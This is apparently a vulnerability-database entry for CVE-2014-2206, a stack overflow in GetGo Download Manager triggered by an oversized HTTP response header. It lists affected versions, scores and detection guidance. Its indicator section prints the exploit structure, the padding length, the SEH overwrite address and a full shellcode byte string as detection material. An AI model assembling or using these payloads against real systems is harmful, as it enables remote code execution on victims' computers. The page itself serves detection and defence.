cbcvebase.
CVE-2014-2206
published 2014-03-05

CVE-2014-2206: Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service…

PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
61.44%
99.1th percentile
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.

Affected

3 ranges
VendorProductVersion rangeFixed in
getgosoftgetgo_download_manager<= 4.4.5.502
getgosoftgetgo_download_manager
getgosoftgetgo_download_manager

Detection & IOCsextracted from sources · hover to see the quote

commandHTTP/1.1 200 <4107 bytes junk>\x90\x90\xEB\x06<SEH>\x90*50<shellcode>\r\n
bytes
\x90 * 4107 (junk) + \x90\x90\xEB\x06 (nseh) + \x00\x28\x0b\x0b (seh) + \x90 * 50 (nops)
bytes
\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea\xa5\x59\x50
  • The exploit triggers via a malicious HTTP response: the overflow is embedded in the HTTP status line (HTTP/1.1 200 <oversized payload>). Detect anomalously large HTTP response status lines (>4000 bytes) served to GetGo Download Manager clients.
  • The SEH overwrite uses address 0x00280b0b (call dword ptr ss:[ebp+30]) sourced from outside loaded modules to bypass SafeSEH. Look for SEH chain overwrites pointing to this address in crash dumps or memory forensics.
  • The overflow requires exactly 4107 bytes of padding before the nSEH/SEH overwrite. Network signatures should flag HTTP responses whose status-reason phrase exceeds ~4100 bytes.
  • The attack vector is a victim downloading a file from an attacker-controlled server. Monitor GetGo Download Manager process network connections to untrusted HTTP servers, especially those returning oversized response headers.
  • The nSEH short-jump sequence \x90\x90\xEB\x06 followed by the 4-byte SEH value \x0b\x0b\x28\x00 is a distinctive byte pattern detectable in HTTP response traffic via IDS/IPS signatures.
  • ·The PoC exploit was tested only on Windows XP SP3 (German locale). The hardcoded SEH gadget address (0x00280b0b) is environment-specific and may not be valid on other OS versions or patch levels.
  • ·The Metasploit module covers a broader version range (up to 5.3.0.2712) than the PoC (4.9.0.1982). Detection rules should account for all affected versions: 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier.
  • ·All loaded modules in the tested environment are SafeSEH-enabled; the exploit specifically sources its SEH gadget from outside loaded modules to bypass this protection. Environments with different module layouts will require a different gadget address.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.